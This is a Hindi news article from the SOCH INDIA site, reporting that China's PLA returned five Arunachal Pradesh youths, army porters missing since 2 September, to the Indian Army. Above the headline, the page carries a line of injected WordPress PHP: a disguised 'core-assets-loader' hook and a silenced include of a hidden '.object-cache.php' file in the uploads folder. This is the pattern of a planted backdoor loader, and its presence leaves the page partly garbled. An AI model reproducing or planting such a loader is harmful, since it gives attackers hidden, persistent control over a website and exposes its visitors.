add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अरुणाचल प्रदेश के 5 युवकों को चीन ने भारत को सौंपा, 2 सितंबर से थे लापता – SOCH INDIA
Menu

देश
अरुणाचल प्रदेश के 5 युवकों को चीन ने भारत को सौंपा, 2 सितंबर से थे लापता

nobanner

अरुणाचल प्रदेश (arunachal pradesh) से 2 सितंबर को लापता हुए 5 युवकों को चीन की पीपल्स लिब्ररेशन आर्मी (PLA) ने भारत को सौंप दिया है. सौंपने से पहले चीन के प्रोपेगंडा अखबार ग्लोबल टाइम्स ने दावा किया था कि वे भारतीय सेना के जासूस हैं. लेकिन भारतीय सेना के लगातार दबाव के बाद PLA उन्हें सौंपने पर सहमत हो गई.

सेना की तेजपुर छावनी के प्रवक्ता ने ट्वीट करके बताया कि पांचों युवकों को शनिवार सुबह 9.30 बजे अरुणाचल के दमाई में भारतीय सेना के सुपुर्द कर दिया गया. यह सूचना सामने आने के बाद कई लोगों ने ट्वीट करके पांचों युवकों की सकुशल वापसी पर बधाई भी दी.

बता दें कि पांचों युवक भारतीय सेना में पोर्टर के रूप में काम करते हैं. सभी युवक 2 सितंबर को भूलवश सीमा पार करके चीन के इलाके में पहुंच गए थे. जिसके बाद PLA ने उन्हें बंदी बना लिया. उनसे बचकर आए दो युवकों ने गांव में आकर यह बात बताई. जिसके बाद पांच युवकों के PLA  द्वारा बंदी बनाने की जानकारी दुनिया के सामने आई.

इसके बाद भारतीय सेना ने हॉटलाइन पर चीनी सेना से संपर्क कर पांचों युवकों को छोड़ने का आग्रह किया था. लेकिन PLA ने अनजान बनते हुए  किसी भी युवक की हिरासत से इनकार किया. PLA के झूठ को तवज्जो न देते हुए भारतीय सेना ने उस पर लगातार दबाव बनाए रखा. जिसके बाद उसे आखिरकार पांचों युवकों को छोड़ने का फैसला लेना पड़ा. इससे पहले केंद्रीय खेल मंत्री (स्वतंत्र प्रभार) किरण रिजिजू ने भी शुक्रवार को ट्वीट करके कहा था कि कि चीन शनिवार को अरुणाचल प्रदेश के पांच युवकों को भारत सरकार को सौंप देगा.